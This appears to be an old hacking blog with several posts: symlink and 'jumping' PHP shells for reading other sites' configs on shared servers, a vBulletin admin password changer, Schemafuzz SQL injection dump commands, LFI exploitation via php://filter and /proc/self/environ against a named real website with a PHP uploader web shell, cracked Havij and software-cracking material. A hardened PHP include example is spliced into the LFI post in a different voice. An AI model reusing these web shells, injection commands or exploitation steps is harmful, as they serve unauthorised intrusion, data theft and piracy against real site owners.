
Sunday, November 25, 2012

Jumping / Bypassing Symlink Shell Linux Script PHP

Jumping / Bypassing Symlink Shell Linux Script PHP: this method is used to access folders and files on a Linux-based server that the user is not permitted to access. By bypassing with a symlink, a user can access files or folders, or open a configuration file in order to connect to the database. Now it is time to share the Symlink Shell Linux script, coded in PHP.


How to use the Symlink bypass Shell script:
  • Download the file sym.zip and upload it into your shell
  • Extract it first with the command unzip sym.zip
  • Run it by opening the symlink script link, e.g. http://site.org/sym.php
  • Click on User & Domain & Symlink
  • Click symlink and it will open the directory of that user

Saturday, November 24, 2012

Vbulletin Admin Password Changer Tool



This tool, named Vbulletin Admin Password Changer Tool, changes the vBulletin administrator password. You can upload it from your shell and run it. Just fill in the name, username and password of the database as configured in config.php. The default admin password is 121098. You can edit the password, which includes a salt, yourself.

Let's Download / see source code Vbulletin Admin Password Changer Tool 

Here is Link for Vbulletin Admin Changer Tool


Wednesday, November 21, 2012

Collection of Jumping Shell / Server Jumping Sites Domain

After you put a shell on a site, for example through SQL injection, Local File Inclusion or Remote File Inclusion, you then want to read another config on its server using a Shell Jumping PHP script, looking for what might be readable in /public/html. Once you have access to the readable sites on the server, you can read or jump to the config file and connect to MySQL on localhost.

I will share PHP scripts / backdoors that include a Jumping Site feature. They are aimed at shell jumping.

1. Server Jumping  Finder Version 3.0


Download Server Jumping Finder Version 3.0
  • Upload the file via Shell
  • Extract file using command unzip jump.zip
  • then run it in URL http://site.com/jump.php
 2. Simple Php Jumping Shell Script


Download Simple Shell Jumping / Jumping Shell
  • Upload the file via Shell
  • Extract file using command unzip jumping.zip
  • then run it in URL http://site.com/jump.php 
 3. b3c4k Lompat V.2.0 - StealHealth

Download b3c4k Lompat V.2.0 - StealHealth
  • Upload the file via Shell
  • Run this shell in http://site.com/b3c4k.php
  • Click On the Tab "Kamar Sebelah"
4.  b374k mini's claimed coded Newbie3viLc063s shell LOL ! (Credit: DevilsCafe)

Download b374k mini
  • Upload the file via Shell
  • Run this shell in http://site.com/b374k.php
  • Click On the Tab "Readable"
After you have found a readable /public/html or read a config file with the jumping shell, just put the path into the folder view in your shell and go!


Wednesday, November 14, 2012

[Tut] Run Schemafuzz.py Database Dump Tool

Nowadays many hacking tools are easy to run, like Havij for database dumps. But someone says that it is a tool for a 3-year-old child. Hahaha. Back to Schemafuzz: this quite old tool, named Schemafuzz, was coded by Darkc0de in the Python language. But it is still useful for pentesting websites that are vulnerable to SQL injection. Let's download it and see the tutorial for the Schemafuzz.py commands.

Requirement :
1. Python (Download Here For Windows)

Here is a preview:

Schemafuzz Preview

How it runs?

1. Finding the column range

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1" --findcol

2. Database name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3" --dbs

3. Table and column name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3" --schema -D databasename

4. Dump it

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3" --dump -D databasename -T tablename -C columnname,Columnname2


Here is Link to download Schemafuzz.py

Download Schemafuzz 

Mirror

 
Download Schemafuzz (From PasteBin)




Tuesday, November 13, 2012

[Tut] LFI php://filter/read Source Code

Read Source Code From LFI


Yeah, there are many techniques we can use to exploit an LFI vulnerability. Before reading on, you could read my post about the technique of uploading a shell via Tamper Data: LFI Exploitation /proc/self/environ.
Now I will tell you about exploiting an LFI vulnerability using php://filter/read=convert.base64-encode/resource=

The goal of this exploit is to read the source of a file on the vulnerable website, but the source comes back encoded in base64.

http://target.com/index.php?page=php://filter/read=convert.base64-encode/resource=file.php


That is an example of the exploitation. You must decode that base64 source code :D

OK, if you want to watch my POC in the video I have made, you can download it.
Thank you for watching ^^

http://www.ziddu.com/download/16299804/LFiAnOtherWAy.rar.html

Or, as a mirror:

http://www.mediafire.com/?mz3y77fgkok2doql




Saturday, May 19, 2012

[TUT] Cracking Software / Cracking lessons

Tutorial Cracking Lesson by Lena151 From Tuts4you Forum
Software Cracking

Cracking Lessons – learn how to crack software with detailed video lessons (Bonus Included)
Professional software crackers are ready to reveal their secrets!
Learn how to crack software with one’s own hands!
From: lena151
We are the first one to offer the most detailed, interesting and entertaining interactive video tutorials on software cracking. Experienced crackers will demonstrate and comment each step of software cracking.
You will study a detailed, step by step lessons created by a real practicing cracker. You don’t need to be a PC guru and don’t even have to master any software programming languages. We will show you how to crack software with both the most simple and the most sophisticated protection systems.
What's included in our Learning Course?
1 Theoretical Introduction
20-page PDF-introduction to cracking.

You’ll get answers to the following questions:
Who cracks software?
What types of protection exist nowadays?
What software is impossible to crack?
What tools are needed for successful cracking?

This information will be useful for you to get a better understanding of the cracking core.
2 36+ Interactive Video Tutorials

This is the valuable part of our training program. At the date, we have done 36 interactive video lessons, that will let you know all the ins and outs of software cracking. We will add new videos per our members’ requests!

Videos are 20-30 mins each. Every action, every click and every event is commented. We give an explanation of what we do and why we do it like that.

List of videos:
Windows cracking [ready to watch and learn!]:
Intro for noobs, asm basics, simple patching — 2 videos
Debugging, tracing, analyzing — 2 videos
Making keyfiles — 1 video
Different methods of patching — 4 videos
Finding serial numbers — 1 video
Removing “nag” screens — 1 video
Cracking Visual Basic software — 2 videos
Cracking Delphi software — 2 videos
Making a “self-keygen” — 1 video
Cracking using resources — 1 video
Intro to packers and protectors — 1 video
Unpacking ASProtect, Armadillo, tElock — 5 videos
“Inline” patching — 2 videos;
Killing online servers check — 2 videos;
Creating loaders — 2 videos
Cracking tricks, anti-debugging, rebuilding PE — 3 videos
Creating a keygen — 1 video
…and more — total 36 videos on Windows cracking!

.NET cracking [in process, coming soon to members area]:
Patching .NET applications — 1 video
Making a keygen on .NET — 1 video

Mobile cracking [in process, coming soon to members area]:
Cracking Windows Mobile software — 2 videos
Cracking Symbian software — 1 video
Cracking iPhone/iPod software — 1 video

Scripts cracking [in process, coming soon to members area]:
Nulling a simple PHP script — 1 video
Nulling Zended and Ioncubed PHP scripts — 1 video
..and more, per our members’ requests!

Basically, you have a full cracking training course in front you, including everything starting from cracking basics to keygen creation.
3 Crackers’ Suite – 600+ cracking tools

This is, perhaps, the most useful part of our proposal. Specially for the Cracking Lessons project, we have gathered all necessary tools for software cracking and protection!

Whats included:
22 file analyzers, 51 debugging tools, 36 decompilers
31 disassembling tools, 47 tools for dongle cracking
40 exe-packers, 44 protectors, 50 exe-unpackers
26 password crackers, 21 crypto tools
39 monitors, 35 patch generators
around 100 programming tools
24 tools for mobile cracking and much much more!




 Source : http://tuts4you.com




Monday, August 8, 2011

Havij Pro version 1.5 Cracked

Havij 1.6 Pro Full Version Download - OK guys, I found it on the devilc0de forum, located at HttP://devilzc0de.org/forum/
Thanks to the devilzc0de member for sharing this Havij Pro version 1.5 Cracked.

Here is a screenshot:

Havij 1.16 Full Version Cracked
Havij 1.6 Pro Full Version Download Cracked

Below is the link where you can download that Havij 1.5 Cracked:

Havij 1.6 Pro Full Version Download


If you get the error "tabctl32.ocx not registered",
simply download it here:
http://www.ocxdump.com/download-ocx-files_new.php/ocxfiles/T/TABCTL32.OCX/6.01.9782/download.html
and paste it in C:/windows/system32

OK happy inject ^^



Monday, April 18, 2011

[Tut] Local File Inclusion / LFI (/proc/self/environ)

LFI (Local File Inclusion) /proc/self/environ Tamper data

What is LFI or Local File Inclusion?
This description is from Wikipedia:
It is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
Example of a vulnerable PHP script:

<?php
// Vulnerable: $_GET['file'] goes into the include path without any validation
$file = $_GET['file'];
if (isset($file))
{
    include("pages/$file");
}
else
{
    include("index.php");
}

So this PHP script could be injected through a URL like:


http://example.com/index.php?file=contactus.php
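The vulnerable include above next to a hardened form, as an added example that is not code from the original post. It also covers the php://filter and /proc/self/environ requests described in the LFI posts on this page, because the request value is only looked up in an allowlist and never becomes part of a path. The `pages/` layout and the page names in `ALLOWED_PAGES` are assumptions.

```php
<?php
// Added example, not from the original post. Requires PHP 7.1+.
// Assumptions: templates live in ./pages; the page names below are hypothetical.

const PAGES_DIR = __DIR__ . '/pages';

// The request value is only ever used as a key into this allowlist,
// never concatenated into a filesystem path or stream URL.
const ALLOWED_PAGES = [
    'home'      => 'home.php',
    'contactus' => 'contactus.php',
    'products'  => 'products.php',
];

/**
 * Map a requested page name to an absolute path inside PAGES_DIR.
 * Returns null when the request must be refused.
 */
function resolve_page($requested): ?string
{
    // ?file[]=x arrives as an array; traversal strings and php:// wrapper
    // URLs are ordinary strings that are simply not allowlist keys.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }

    // Defence in depth: realpath() resolves ".." and symlinks, so a template
    // swapped for a symlink that points outside pages/ is refused as well.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

$requested = $_GET['file'] ?? 'home';
$path = resolve_page($requested);

if ($path === null) {
    // Record the refused value for later review. Control characters are
    // replaced so the request cannot forge extra log lines.
    $shown = is_string($requested) ? substr($requested, 0, 200) : gettype($requested);
    error_log('include refused: ' . preg_replace('/[\x00-\x1f\x7f]/', '?', $shown));
    http_response_code(404);
    exit('Page not found');
}

include $path;
```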


OK, now I will show you a POC exploiting this vulnerability by way of backdooring a shell via Tamper Data.

1. First, you could search Google for vulnerable websites. Here is the list of dorks I've collected.


2. OK, after you get a website, check that website.
For example:
http://vanessasbodymall.com/index.php?page=products.php

Can that website call the /etc/passwd file?
You could add ../../ to go up to that server's website directory:
http://vanessasbodymall.com/index.php?page=/etc/passwd

3. So if '/etc/passwd' can be called, that site is vulnerable to LFI. So how do you plant a web shell / backdoor? You should check whether /proc/self/environ can be called, so the URI looks like the one below:
http://vanessasbodymall.com/index.php?page=../../../../../../../../proc/self/environ

4. Upload the shell via Tamper Data
You should download that Firefox plugin. Here I give you the link:
https://addons.mozilla.org/en-us/firefox/downloads/file/79565/tamper_data-11.0.1-fx.xpi?src=addondetail&confirmed=1

OK, the next steps after installing the plugin:

a. Restart your Mozilla Firefox browser
b. Then click "Tool" > "MenuBar" and click "Tamper Data"
c. Click start tamper > then refresh the page
d. A pop-up will appear > click "Tamper"
e. Replace it with this code, or with any evil PHP code
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

f. Yes, right. If you succeed in planting that PHP script, it will be located at http://vanessasbodymall.com/Yourshellname.php


Monday, November 22, 2010

FERN WIFI CRACKER New Version (wep and wpa Cracker tool)

Fern Wifi Cracker is a wireless security auditing and attack software program written using the Python programming language and the Python Qt GUI library. The program is able to crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks.
Operating System Supported

The software runs on any Linux machine with the program's prerequisites, but the program has been tested on the following Linux-based operating systems:

  • Ubuntu KDE/GNOME
  • BackTrack Linux
  • BackBox Linux

Prerequisites
The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on debian based systems using "apt-get install program" or otherwise downloaded and installed manually
  • Aircrack-NG
  • Python-Scapy
  • Python Qt4
  • Python
  • Subversion
  • Xterm
  • Reaver (for WPS Attacks)
  • Macchanger
Features
Fern Wifi Cracker currently supports the following features:
  • WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Update Support
Installation
Installation on Debian Package supported systems:
root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb
The Source Code for the program can be fetched using the following command on terminal
root@host:~# svn checkout http://fern-wifi-cracker.googlecode.com/svn/Fern-Wifi-Cracker/

This is the screenshot and description from the author:

Fern Wifi Cracker new release

It's Linux based, looks better on the Gnome than the KDE desktop interface. If you're using KDE, the executable is in the directory /usr/local/bin/Fern-Wifi-Cracker. I'm giving this due to the fact that the Debian installer was created for Gnome, so the shortcut will be created for Gnome after generic installation "dpkg -i Fern-Wifi-Cracker_1.0_all.deb". For KDE users, you may have to create a shortcut yourself after the installation.
Just created the Google Code page for hosting it..... So please bear with the fact that I don't have a wiki help page yet

Download ( From Google Code )

DEVELOPER : Saviour Emmanuel Ekiko

Source
http://www.backtrack-linux.org/forums/experts-forum/34517-new-fern-wifi-cracker.html
http://code.google.com/p/fern-wifi-cracker/
